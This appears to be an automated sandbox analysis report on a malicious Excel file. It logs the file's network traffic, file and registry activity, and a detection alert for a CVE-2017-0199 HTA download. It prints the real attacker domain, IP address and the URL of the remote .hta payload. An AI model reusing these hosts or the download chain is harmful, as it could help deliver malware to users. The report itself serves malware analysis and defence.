Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx |
ReversingLabs: Detection: 45% |
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx |
Joe Sandbox ML: detected |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: unknown |
HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2 |
Source: global traffic |
DNS query: name: u4u.kids |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 192.168.2.22:49161 -> 24.199.88.84:443 |
Source: global traffic |
TCP traffic: 24.199.88.84:443 -> 192.168.2.22:49161 |
Source: global traffic |
TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80 |
Source: global traffic |
TCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162 |
Source: global traffic |
TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80 |
Source: global traffic |
TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80 |
Source: global traffic |
TCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162 |
Source: global traffic |
TCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162 |
Source: global traffic |
TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80 |
Source: global traffic |
TCP traffic: 107.175.113.214:80 -> 192.168.2.22:49162 |
Source: global traffic |
TCP traffic: 192.168.2.22:49162 -> 107.175.113.214:80 |
Source: Joe Sandbox View |
IP Address: 24.199.88.84 24.199.88.84 |
Source: Joe Sandbox View |
JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b |
Source: Network traffic |
Suricata IDS: 2024449 - Severity 1 - ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl : 192.168.2.22:49162 -> 107.175.113.214:80 |
Source: global traffic |
HTTP traffic detected: GET /n7pOWA?®ulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.113.214Connection: Keep-Alive |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.175.113.214 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.175.113.214 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.175.113.214 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.175.113.214 |
Source: unknown |
TCP traffic detected without corresponding DNS query: 107.175.113.214 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A51302D8.emf |
Jump to behavior |
Source: global traffic |
HTTP traffic detected: GET /n7pOWA?®ulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: u4u.kidsConnection: Keep-Alive |
Source: global traffic |
HTTP traffic detected: GET /xampp/nx/nixogivenbestthingswithgreatthingswillinthelineforgreatthings.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 107.175.113.214Connection: Keep-Alive |
Source: global traffic |
DNS traffic detected: DNS query: u4u.kids |
Source: global traffic |
HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 24 Oct 2024 19:19:25 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Content-Length: 301Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 32 2e 31 32 20 53 65 72 76 65 72 20 61 74 20 31 30 37 2e 31 37 35 2e 31 31 33 2e 32 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12 Server at 107.175.113.214 Port 80</address></body></html> |
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx, EC130000.0.dr |
String found in binary or memory: https://u4u.kids/n7pOWA?®ulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famo |
Source: unknown |
Network traffic detected: HTTP traffic on port 49161 -> 443 |
Source: unknown |
Network traffic detected: HTTP traffic on port 443 -> 49161 |
Source: unknown |
HTTPS traffic detected: 24.199.88.84:443 -> 192.168.2.22:49161 version: TLS 1.2 |
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx |
OLE: Microsoft Excel 2007+ |
Source: EC130000.0.dr |
OLE: Microsoft Excel 2007+ |
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx |
OLE indicator, VBA macros: true |
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx |
Stream path 'MBD000C18C7/\x1Ole' : https://u4u.kids/n7pOWA?®ulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer_?ld *qXI4K$?ZdS]A3-NCfA9Uhke+\KbkeEeKKBOAo67gjObkwtGlCx014vSFxNq4ShyEnQkyL6vL7MGxS2DvTe3iBhC0tnql529f9XeMVpSTv4C1NQj94I0SuJd51POVewV6GCuNYQlZ9C9hKyAMY6zzTTdujv8JIJSoa0kNiMPtWUg0tlDz43kHFMFex2P85fqhyXWsDW2KDXz5gWrLO9sLLbrwDGSDHma9tB7VUGgUtnB`Mp8O>Lk]W |
Source: EC130000.0.dr |
Stream path 'MBD000C18C7/\x1Ole' : https://u4u.kids/n7pOWA?®ulation=noisy&mixer=needless&brown=grotesque&parent=jumbled&luttuce=famous&harbour=chivalrous&champion=Early&printer_?ld *qXI4K$?ZdS]A3-NCfA9Uhke+\KbkeEeKKBOAo67gjObkwtGlCx014vSFxNq4ShyEnQkyL6vL7MGxS2DvTe3iBhC0tnql529f9XeMVpSTv4C1NQj94I0SuJd51POVewV6GCuNYQlZ9C9hKyAMY6zzTTdujv8JIJSoa0kNiMPtWUg0tlDz43kHFMFex2P85fqhyXWsDW2KDXz5gWrLO9sLLbrwDGSDHma9tB7VUGgUtnB`Mp8O>Lk]W |
Source: classification engine |
Classification label: mal56.winXLSX@1/7@1/2 |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\Desktop\~$SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File created: C:\Users\user\AppData\Local\Temp\CVR8AE0.tmp |
Jump to behavior |
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx |
OLE indicator, Workbook stream: true |
Source: EC130000.0.dr |
OLE indicator, Workbook stream: true |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File read: C:\Users\desktop.ini |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA |
Jump to behavior |
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx |
ReversingLabs: Detection: 45% |
Source: Window Recorder |
Window detected: More than 3 window changes detected |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll |
Jump to behavior |
Source: EC130000.0.dr |
Initial sample: OLE indicators vbamacros = False |
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx |
Initial sample: OLE indicators encrypted = True |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
Process information set: NOOPENFILEERRORBOX |
Jump to behavior |
Source: SecuriteInfo.com.Other.Malware-gen.26961.24680.xlsx |
Stream path 'Workbook' entropy: 7.9744732217 (max. 8.0) |
Source: EC130000.0.dr |
Stream path 'Workbook' entropy: 7.97390903279 (max. 8.0) |